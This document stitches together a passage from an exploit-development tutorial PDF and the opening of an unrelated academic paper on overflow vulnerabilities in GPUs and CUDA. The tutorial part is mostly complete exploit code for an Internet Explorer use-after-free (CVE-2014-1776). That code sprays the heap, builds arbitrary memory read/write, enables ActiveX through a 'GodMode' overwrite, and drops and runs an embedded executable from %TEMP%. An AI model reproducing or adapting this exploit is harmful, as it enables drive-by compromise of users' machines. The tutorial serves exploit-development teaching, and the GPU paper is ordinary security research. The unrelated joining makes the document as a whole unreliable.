);
   
// '
\
'
 
      
}
 
      
try
 
{
 
        
bStream
.
SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
 
Completing the exploit (2)
 
It’s high time we completed thi
s exploit! Here’s the full code:
 
XHTML
 
 
<html
 
xmlns:v
=
"urn:schemas
-
microsoft
-
com:vml"
>
 
<head
 id=
"haed"
>
 
<title>
IE Case Study 
-
 STEP1
</title>
 
<style>
 
        v
\
:*{Behavior: url(#default#VML)}
 
</style>
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE
9"
 
/>
 
<script
 language=
"javascript"
>
 
  
magic_addr
 
=
 
0xc000000
;
 
 
function
 
dword2Str
(
dword
)
 
{
 
    
var
 
low
 
=
 
dword
 
%
 
0x10000
;
 
    
var
 
high
 
=
 
Math.floor
(
dword
 
/
 
0x10000
);
 
    
if
 
(
low
 
==
 
0
 
||
 
high
 
==
 
0
)
 
      
alert
(
"dword2Str: null wchars not allowed"
);
 
    
return
 
String.fromCharCode
(
low
,
 
high
);
 
  
}
 
  
function
 
getPattern
(
offset_values
,
 
tot_bytes
)
 
{
 
    
if
 
(
tot_bytes
 
%
 
4
 
!=
 
0
)
 
      
alert
(
"getPattern(): tot_bytes is not a multiple of 4"
);
 
    
var
 
pieces
 
=
 
new
 
Array
();
 
    
var
 
pos
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
offse
t_values.length
/
2
;
 
++
i
)
 
{
 
      
var
 
offset
 
=
 
offset_values
[
i
*
2
];
 
      
var
 
value
 
=
 
offset_values
[
i
*
2
 
+
 
1
];
 
      
var
 
padding
 
=
 
new
 
Array
((
offset
 
-
 
pos
)/
2
 
+
 
1
).
join
(
"a"
);
 
      
pieces.push
(
padding
 
+
 
dword2Str
(
value
));
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 521 
-
 
      
pos
 
=
 
offset
 
+
 
4
;
 
    
}
 
    
// Th
e "
-
 2" accounts for the null wchar at the end of the string.
 
    
var
 
padding
 
=
 
new
 
Array
((
tot_bytes
 
-
 
2
 
-
 
pos
)/
2
 
+
 
1
).
join
(
"a"
);
 
    
pieces.push
(
padding
);
 
    
return
 
pieces.join
(
""
);
 
  
}
 
 
function
 
trigger
()
 
{
 
    
var
 
head
 
=
 
document.getElementById
(
"hae
d"
)
 
    
tmp
 
=
 
document.createElement
(
"CVE
-
2014
-
1776"
)
 
    
document.getElementById
(
"vml"
).
childNodes
[
0
].
appendChild
(
tmp
)
 
    
tmp.appendChild
(
head
)
 
    
tmp
 
=
 
head.offsetParent
 
    
tmp.onpropertychange
 
=
 
function
(){
 
      
this
[
"removeNode"
](
true
)
 
      
docume
nt.createElement
(
"CVE
-
2014
-
1776"
).
title
 
=
 
""
 
      
var
 
elem
 
=
 
document.createElement
(
"div"
);
 
      
elem.className
 
=
 
getPattern
([
 
        
0xa4
,
 
magic_addr
 
+
 
0x20
 
-
 
0xc
,
      
// X; X+0xc 
--
> b[0]
 
        
0x118
,
 
magic_addr
 
+
 
0x24
 
+
 
0x24
,
    
// U; U 
--
>
 (*); U
-
0x24 
--
> b[1]
 
        
0x198
,
 
-
1
                           
// bit 12 set
 
      
],
 
0x428
);
 
    
}
 
    
head.firstChild.nextSibling.disabled
 
=
 
head
 
  
}
 
 
// The object is 0x428 bytes.
 
  
// Conditions to control the bug and force an INC of dword at mag
ic_addr + 0x1b:
 
  
//   X = [ptr+0A4h] ==> Y = [X+0ch] ==>
 
  
//               [Y+208h] is 0
 
  
//               [Y+630h+248h] = [Y+878h] val to inc!      
<======
 
  
//               [Y+630h+380h] = [Y+9b0h] has bit 16 set
 
  
//               [Y+630h+3f4h] = [Y
+0a24h] has bit 7 set
 
  
//               [Y+1044h] is 0
 
  
//   U = [ptr+118h] ==> [U] is 0 => V = [U
-
24h] => W = [V+1ch],
 
  
//               [W+0ah] has bit 1 set & bit 4 unset
 
  
//               [W+44h] has bit 7 set
 
  
//               [W+5ch] is writable
 
  
//   [ptr+198h] has bit 12 set
 
  
window.onload
 
=
 
function
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_l
en
);
 
 
var
 
idx
;
 
      
b
 
=
 
a
[
i
];
 
      
b
[
0
]
 
=
 
magic_addr
 
+
 
0x1b
 
-
 
0x878
;
         
// Y
 
      
idx
 
=
 
Math.floor
((
b
[
0
]
 
+
 
0x9b0
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
         
// index for Y+9b0h
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
      
idx
 
=
 
Math.floor
((
b
[
0
]
 
+
 
0xa24
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
         
// index for Y+0a24h
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 522 
-
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
      
idx
 
=
 
Math.floor
((
b
[
0
]
 
+
 
0x1044
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
        
// index for Y+1044h
 
      
b
[
idx
]
 
=
 
0
;
 
b
[
idx
+
1
]
 
=
 
0
;
 
      
// The following address would be neg
ative so we add 0x10000 to translate the address
 
      
// from the previous copy of the array to this one.
 
      
idx
 
=
 
Math.floor
((
b
[
0
]
 
+
 
0x208
 
-
 
(
magic_addr
 
+
 
0x20
)
 
+
 
0x10000
)/
4
);
   
// index for Y+208h
 
      
b
[
idx
]
 
=
 
0
;
 
b
[
idx
+
1
]
 
=
 
0
;
 
      
b
[
1
]
 
=
 
magic_ad
dr
 
+
 
0x28
 
-
 
0x1c
;
          
// V, [U
-
24h]; V+1ch 
--
> b[2]
 
      
b
[(
0x24
 
+
 
0x24
 
-
 
0x20
)/
4
]
 
=
 
0
;
            
// [U] (*)
 
      
b
[
2
]
 
=
 
magic_addr
 
+
 
0x2c
 
-
 
0xa
;
           
// W; W+0ah 
--
> b[3]
 
      
b
[
3
]
 
=
 
2
;
                                 
// [W+0ah]
 
      
idx
 
=
 
Math.floor
((
b
[
2
]
 
+
 
0x44
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
      
// index for W+44h
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
    
}
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffer header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 000
00000 00000000 00000001 00003ff8 00000000
 
    
//                                                       array_len buf_len
 
    
//    alert("Modify the 
\
"Buffer length
\
" field of the Array at 0x" + magic_addr.toString(16));
 
    
trigger
();
 
    
// Locate 
the modified Array.
 
    
idx
 
=
 
-
1
;
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to modify the first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If we successfully modified the first element of the next
 Array, then a[i]
 
      
// is the Array whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
        
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
//      alert("Can't find the modified Array");
 
      
window.location.reload
();
 
      
retu
rn
;
 
    
}
 
    
// Modify the second Array for reading/writing everywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
][
array_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0x10000
 
+
 
header_size
;
 
    
// Very Important:
 
    
//    The numbers in Array are signed int32. Numbers greater than 0x7fffffff are
 
    
//    converted to 64
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx+1][index] = 0xc1a0c
1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed int32.
 
    
//    We'll need to represent 0xc1a0c1a0 as a negative integer:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 523 
-
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
      
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
return
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
 
// The value returned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
     
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// val must be in [0, 0x
ffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
     
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
]
 
=
 
val
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
a
[
idx
+
2
][
0
]
 
=
 
obj
;
 
      
return
 
read
(
base_addr
 
+
 
0x10000
);
 
    
}
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!HostDispatch::`vftab
le' = jscript9 + 0x5480
 
    
//      v
 
    
//  6cc55480 05354280 00000000 0536cfb0
 
    
//
 
    
// To find the vftable MSHTML!CDivElement::`vftable', we must follow a chain of pointers:
 
    
//   X = [div_elem+0ch]
 
    
//   X = [X+8]
 
    
//   obj_ptr = [X+10h]
 
    
//   vftptr = [obj_ptr]
 
    
// where vftptr = vftable MSHTML!CDivElement::`vftable' = mshtml + 0x3aeb04.
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x5480
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 524 
-
 
    
mshtml
 
=
 
read
(
read
(
read
(
read
(
addr
 
+
 
0xc
)
 
+
 
8
)
 
+
 
0x10
))
 
-
 
0x3aeb04
;
 
 
var
 
old1
 
=
 
read
(
mshtml
+
0xebcd98
+
0x10
);
 
    
var
 
old2
 
=
 
read
(
mshtml
+
0xebcd98
+
0x14
);
 
 
function
 
GodModeOn
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
jscript9
+
0x155e19
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
jscript9
+
0x155d7d
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
mshtml
+
0xebcd98
+
0x10
,
 
old1
);
 
      
write
(
mshtml
+
0xebcd98
+
0x14
,
 
old2
);
 
    
}
 
 
// content of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
fu
nction
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStrea
m
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
if
 
(
read
(
string_addr
)
 
!=
 
0
)
 
{
         
// only when there is a string to overwrite
 
        
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
        
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
}
 
      
try
 
{
 
        
bStream.SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
}
 
      
catch
(
err
)
 
{
 
        
return
 
0
;
 
      
}
 
      
tStream.Close
();
 
      
bStream.Close
();
 
      
return
 
1
;
 
    
}
 
 
// decode
r
 
    
// [https://gist.github.com/1020396] by [https://github.com/atk]
 
    
function
 
atob
(
input
)
 
{
 
      
var
 
chars
 
=
 
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
;
 
      
var
 
str
 
=
 
String
(
input
).
replace
(
/=+$/
,
 
''
);
 
      
if
 
(
str.length
 
%
 
4
 
==
 
1
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 525 
-
 
        
throw
 
new
 
InvalidCharacterError
(
"'atob' failed: The string to be decoded is not correctly encoded."
);
 
      
}
 
      
for
 
(
 
        
// initialize result and counters
 
        
var
 
bc
 
=
 
0
,
 
bs
,
 
buffer
,
 
idx
 
=
 
0
,
 
output
 
=
 
''
;
 
        
// get nex
t character
 
        
buffer
 
=
 
str.charAt
(
idx
++);
 
        
// character found in table? initialize bit storage and add its ascii value;
 
        
~
buffer
 
&&
 
(
bs
 
=
 
bc
 
%
 
4
 
?
 
bs
 
*
 
64
 
+
 
buffer
 
:
 
buffer
,
 
          
// and if not first of each 4 characters,
 
          
// convert the first 8 bits to one ascii character
 
          
bc
++
 
%
 
4
)
 
?
 
output
 
+=
 
String.fromCharCode
(
255
 
&
 
bs
 
>>
 
(
-
2
 
*
 
bc
 
&
 
6
))
 
:
 
0
 
      
)
 
{
 
        
// try to find character in table (0
-
63, not found => 
-
1)
 
        
buffer
 
=
 
chars.indexOf
(
buffer
);
 
      
}
 
      
return
 
output
;
 
    
}
 
 
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
a
rr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
GodModeOn
();
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
GodModeOff
();
 
    
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
//      alert("SaveToFile failed");
 
      
window.loca
tion.reload
();
 
      
return
 
0
;
 
    
}
 
    
shell.Exec
(
fname
);
 
//    alert("Done");
 
  
}
 
</script>
 
</head>
 
<body>
<v:group id="vml" style="width:500pt;">
<div></div>
</group>
</body>
 
</html>
 
 
Once again, I snipped 
runcalc
. You can download the full code from here:
 
code8
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 526 
-
 
This code works fine but IE may crash from time to time. This isn’t a major problem because when the user 
closes the crash dialog box the page is reloaded and the
 exploit is run again.
 
The new code has some subtleties so let’s discuss the important points. Let’s start with 
trigger()
:
 
JavaScript
 
 
function
 
trigger
()
 
{
 
    
var
 
head
 
=
 
document
.
getElementById
(
"haed"
)
 
    
tmp
 
=
 
document
.
createElement
(
"CVE
-
2014
-
1776"
)
 
 
document
.
getElementById
(
"vml"
).
childNodes
[
0
].
appendChild
(
tmp
)
 
    
tmp
.
appendChild
(
head
)
 
    
tmp
 
=
 
head
.
offsetParent
 
    
tmp
.
onpropertychange
 
=
 
function
(){
 
      
this
[
"removeNode"
](
true
)
 
      
document
.
createElement
(
"CVE
-
2014
-
1776"
).
title
 
=
 
""
 
      
var
 
elem
 
=
 
document
.
createElement
(
"div"
);
 
      
elem
.
className
 
=
 
getPattern
([
 
        
0xa4
,
 
magic_addr
 
+
 
0x20
 
-
 
0xc
,
      
// X; X+0xc 
--
> b[0]
 
        
0x118
,
 
magic_addr
 
+
 
0x24
 
+
 
0x24
,
    
// U; U 
--
> (*); U
-
0x24 
--
> b[1]
 
        
0x198
,
 
-
1
                
           
// bit 12 set
 
      
],
 
0x428
);
 
    
}
 
    
head
.
firstChild
.
nextSibling
.
disabled
 
=
 
head
 
  
}
 
 
The function 
getPattern
 takes an array of the form
 
JavaScript
 
 
[
offset_1
,
 
value_1
,
 
offset_2
,
 
value_2
,
 
offset_3
,
 
value_3
,
 
...]
 
 
and the size in bytes of the
 pattern. The pattern returned is a string of the specified size which 
value_1
, 
value_2
, etc... at the specified offsets.
 
I hope the comments are clear enough. For instance, let’s consider this line:
 
JavaScript
 
 
0xa4
,
 
magic_addr
 
+
 
0x20
 
-
 
0xc
,
      
// X; X+
0xc 
--
> b[0]
 
 
This means that
 
X = magic_addr + 0x20 
-
 0xc
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 527 
-
 
which is defined in a way that 
X+0xc
 points to 
b[0]
, where 
b[0]
 is the first element of the 
Array
 at 
magic_addr
 
(
0xc000000
 in our code).
 
To understand this better, let’s consider the full schema:
 
Ja
vaScript
 
 
.
 
  
.
 
  
.
 
  
elem
.
className
 
=
 
getPattern
([
 
    
0xa4
,
 
magic_addr
 
+
 
0x20
 
-
 
0xc
,
      
// X; X+0xc 
--
> b[0]
 
    
0x118
,
 
magic_addr
 
+
 
0x24
 
+
 
0x24
,
    
// U; U 
--
> (*); U
-
0x24 
--
> b[1]
 
    
0x198
,
 
-
1
                           
// bit 12 set
 
  
],
 
0x428
);
 
 
.
 
  
.
 
  
.
 
  
// The object is 0x428 bytes.
 
  
// Conditions to control the bug and force an INC of dword at magic_addr + 0x1b:
 
  
//   X = [ptr+0A4h] ==> Y = [X+0ch] ==>
 
  
//               [Y+208h] is 0
 
  
//               [Y+630h+248h] = [Y+878h] val to inc!
      
<======
 
  
//               [Y+630h+380h] = [Y+9b0h] has bit 16 set
 
  
//               [Y+630h+3f4h] = [Y+0a24h] has bit 7 set
 
  
//               [Y+1044h] is 0
 
  
//   U = [ptr+118h] ==> [U] is 0 => V = [U
-
24h] => W = [V+1ch],
 
  
//               [W+0a
h] has bit 1 set & bit 4 unset
 
  
//               [W+44h] has bit 7 set
 
  
//               [W+5ch] is writable
 
  
//   [ptr+198h] has bit 12 set
 
  
window
.
onload
 
=
 
function
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
 
var
 
idx
;
 
      
b
 
=
 
a
[
i
];
 
      
b
[
0
]
 
=
 
magic_addr
 
+
 
0x1b
 
-
 
0x878
;
         
// Y
 
      
idx
 
=
 
Math
.
floor
((
b
[
0
]
 
+
 
0x9b0
 
-
 
(
magic_addr
 
+
 
0x
20
))/
4
);
         
// index for Y+9b0h
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
      
idx
 
=
 
Math
.
floor
((
b
[
0
]
 
+
 
0xa24
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
         
// index for Y+0a24h
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
      
idx
 
=
 
Math
.
floor
((
b
[
0
]
 
+
 
0x1044
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
        
// index for Y+1044h
 
      
b
[
idx
]
 
=
 
0
;
 
b
[
idx
+
1
]
 
=
 
0
;
 
      
// The following address would be negative so we add 0x10000 to translate the address
 
      
// from the previous copy of the array to this one.
 
      
idx
 
=
 
Math
.
floor
((
b
[
0
]
 
+
 
0x208
 
-
 
(
magic_addr
 
+
 
0x20
)
 
+
 
0x10000
)/
4
);
   
// index for Y+208h
 
      
b
[
idx
]
 
=
 
0
;
 
b
[
idx
+
1
]
 
=
 
0
;
 
      
b
[
1
]
 
=
 
magic_addr
 
+
 
0x28
 
-
 
0x1c
;
          
// V, [U
-
24h]; V+1ch 
--
> b[2]
 
      
b
[(
0x24
 
+
 
0x24
 
-
 
0x20
)/
4
]
 
=
 
0
;
            
// [U] (*)
 
      
b
[
2
]
 
=
 
magic_addr
 
+
 
0x2c
 
-
 
0xa
;
           
// W; W+0ah 
--
> b[3]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 528 
-
 
      
b
[
3
]
 
=
 
2
;
                                 
// [W+0ah]
 
      
idx
 
=
 
Math
.
floor
((
b
[
2
]
 
+
 
0x44
 
-
 
(
magic_addr
 
+
 
0x20
))/
4
);
      
// index for W+44h
 
      
b
[
idx
]
 
=
 
-
1
;
 
b
[
idx
+
1
]
 
=
 
-
1
;
 
    
}
 
 
Let’s consider this part of th
e schema:
 
JavaScript
 
 
//   X = [ptr+0A4h] ==> Y = [X+0ch] ==>
 
  
//               [Y+208h] is 0
 
  
//               [Y+630h+248h] = [Y+878h] val to inc!      
<======
 
 
As we’ve seen,
 
JavaScript
 
 
0xa4
,
 
magic_addr
 
+
 
0x20
 
-
 
0xc
,
      
// X; X+0xc 
--
> b[0]
 
 
mean
s that
 
X = [ptr+0A4h] = magic_addr + 0x20 
-
 0xc
 
so that 
X+0cx
 points to 
b[0]
.
 
Then we have
 
JavaScript
 
 
b
[
0
]
 
=
 
magic_addr
 
+
 
0x1b
 
-
 
0x878
;
         
// Y
 
 
which means that
 
Y = [X+0ch] = magic_addr + 0x1b 
-
 0x878
 
The schema tells us that 
[Y+878h]
 must be the va
lue to increment. Indeed, 
Y+0x878
 is 
magic_addr + 0x1b
 
which points to the highest byte of the length of the 
Array
 at 
magic_addr
 (
0xc000000
 in our code). Note that 
we increment the dword at 
magic_addr + 0x1b
 which has the effect of incrementing the byte at
 the same 
address.
 
The schema also dictates that 
[Y+208h]
 be 
0
. This is accomplished by the following lines:
 
JavaScript
 
 
idx
 
=
 
Math
.
floor
((
b
[
0
]
 
+
 
0x208
 
-
 
(
magic_addr
 
+
 
0x20
)
 
+
 
0x10000
)/
4
);
   
// index for Y+208h
 
b
[
idx
]
 
=
 
0
;
 
b
[
idx
+
1
]
 
=
 
0
;
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 529 
-
 
Here there are two
 important points:
 
1
.
 
Y = b[0] = magic_addr + 0x1b 
–
 0x878
 so it’s not a multiple of 
4
. Because of this, 
Y+208h
 isn’t a 
multiple of 
4
 either. To modify the misaligned dword 
[Y+208h]
, we need to modify the dwords 
[Y+206h]
 
and
 [Y+20ah]
 which coincide with the e
lements
 b[idx]
 and 
b[idx+1]
. That’s why we use 
Math.floor
.
 
2
.
 
The computed value 
b[0] + 0x208 
–
 (magic_addr + 0x20)
 is negative. Because we’ve chosen 
Y
 so 
that 
Y+878h
 points to the header of the 
Array
 at 
magic_addr
, 
Y+9b0h
 and 
Y+0a24h
 (see the schema) 
point t
o the same 
Array
, but 
Y+208h
 points to the previous 
Array
. Every 
Array
 will have the same content 
so, since adjacent 
Arrays
 are 
0x10000
 bytes apart, by writing the value into the memory at address 
Y+208h+10000h
 (i.e. in the current 
Array
), we’ll also end u
p writing that value into the memory at address 
Y+208h
.
 
To conclude our discussion, note that the function 
trigger
 is called only once. A single increment is more 
than enough because we just need to write a few bytes beyond the end of the 
Array
 at 
magic_ad
dr
.
 
 
Copyright ©
 
massimi
l
iano To
massoli
 
 
... All Rights Reserved
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
ThAnks For This AmAzing TuToriAls 

 
 
Pdf By : 
NO
-
MERCY
 
 A Study of Overflow Vulnerabilities on GPUs
Bang Di, Jianhua Sun(B), and Hao Chen
College of Computer Science and Electronic Engineering,
Hunan University, Changsha 410082, China
{dibang,jhsun,haochen }@hnu.edu.cn
Abstract. GPU-accelerated computing gains rapidly-growing popular-
ity in many areas such as scientific computing, database systems, and
cloud environments. However, there are less investigations on the security
implications of concurrently running GPU applications. In this paper, weexplore security vulnerabilities of CUDA from multiple dimensions. In
particular, we first present a study on GPU stack, and reveal that stack
overflow of CUDA can affect the execution of other threads by manipu-lating different memory spaces. Then, we show that the heap of CUDA
is organized in a way that allows threads from the same warp or different
blocks or even kernels to overwrite each other’s content, which indicatesa high risk of corrupting data or steering the execution flow by over-
writing function pointers. Furthermore, we verify that integer overflow
and function pointer overflow in struct also can be exploited on GPUs.
But other attacks against format string and exception handler seems not
feasible due to the design choices of CUDA runtime and programming
language features. Finally, we propose potential solutions of preventingthe presented vulnerabilities for CUDA.
Keywords: GPGPU
·CUDA ·Security ·Buffer overflow
1 Introduction
Graphics processing units (GPUs) were originally developed to perform com-
plex mathematical and geometric calculations that are indispensable parts ofgraphics rendering. Nowadays, due to the high performance and data paral-
lelism, GPUs have been increasingly adopted to perform generic computational
tasks. For example, GPUs can provide a significant speed-up for financial andscientific computations. GPUs also have been used to accelerate network traf-
fic processing in software routers by offloading specific computations to GPUs.
Computation-intensive encryption algorithms like AES have also been ported toGPU platforms to exploit the data parallelism, and significant improvement in
throughput was reported. In addition, using GPUs for co-processing in database
systems, such as offloading query processing to GPUs, has also been shown tobe beneficial.
With the remarkable success of adopting GPUs in a diverse range of real-
world applications, especially the flourish of cloud computing and advancement
c⃝IFIP International Federation for Information Processing 2016
Published by Springer International Publishing AG 2016. All Rights ReservedG.R. Gao et al. (Eds.): NPC 2016, LNCS 9966, pp. 103–115, 2016.DOI: 10.1007/978-3-319-47099-3
9
104 B. Di et al.
in GPU virtualization [ 1], sharing GPUs among cloud tenants is increasingly
becoming norm. For example, major cloud vendors such as Amazon and Alibababoth offer GPU support for customers. However, this poses great challenges in
guaranteeing strong isolation between different tenants sharing GPU devices.
As will be discussed in this paper, common well-studied security vulnerabil-
ities on CPUs, such as the stack and heap overflow and integer overflow, exist
on GPUs too. Unfortunately, with high concurrency and lacking effective pro-
tection, GPUs are subject to greater threat. In fact, the execution model ofGPU programs consisting of CPU code and GPU code, is different from tradi-
tional programs that only contains host-side code. After launching a GPU kernel
(defined in the following section), the execution of the GPU code is delegated tothe device and its driver. Therefore, we can know that the GPU is isolated from
the CPU from the perspective of code execution, which means that the CPU can
not supervise its execution. Thus, existing protection techniques implemented on
CPUs are invalid for GPUs. On the other hand, the massively parallel execu-
tion model of GPUs makes it difficult to implement efficient solutions tacklingsecurity issues. Unfortunately, despite GPU’s pervasiveness in many fields, a
thorough awareness of GPU security is lacking, and the security of GPUs are
subject to threat especially in scenarios where GPUs are shared, such as GPUclusters and cloud.
From the above discussion, we know that GPUs may become a weakness that
can be exploited by adversaries to execute malicious code to circumvent detectionor steal sensitive information. For example, although GPU-assisted encryption
algorithms achieve high performance, information leakage such as private secrete
key has been proven to be feasible [ 2]. In particular, in order to fully exert the
computing power of GPUs, effective approaches to providing shared access to
GPUs has been proposed in the literature [ 3,4]. However, without proper media-
tion mechanisms, shared access may cause information leakage as demonstratedin [2]. Furthermore, we expect that other traditional software vulnerabilities on
CPU platforms would have important implications for GPUs, because of similar
language features (CUDA programming language inherits C/C++). Although
preliminary experiments has been conducted to show the impact of overflow
issues on GPU security [ 5], much remains unclear considering the wide spectrum
of security issues. In this paper, we explore the potential overflow vulnerabilities
on GPUs. To the best of our knowledge, it is the most extensive study on over-
flow issues for GPU architectures. Our evaluation was conducted from multipleaspects, which not only includes different types of attacks but also considers
specific GPU architectural features like distinct memory spaces and concurrent
kernel execution. Although we focus on the CUDA platform, we believe theresults are also applicable to other GPU programming frameworks.
The rest of this paper is organized as follows. Section 2provides necessary
background about the CUDA architecture. In Sect. 3, we perform an extensive
evaluation on how traditional overflow vulnerabilities can be implemented on
GPUs to affect the execution flow. Possible countermeasures are discussed in
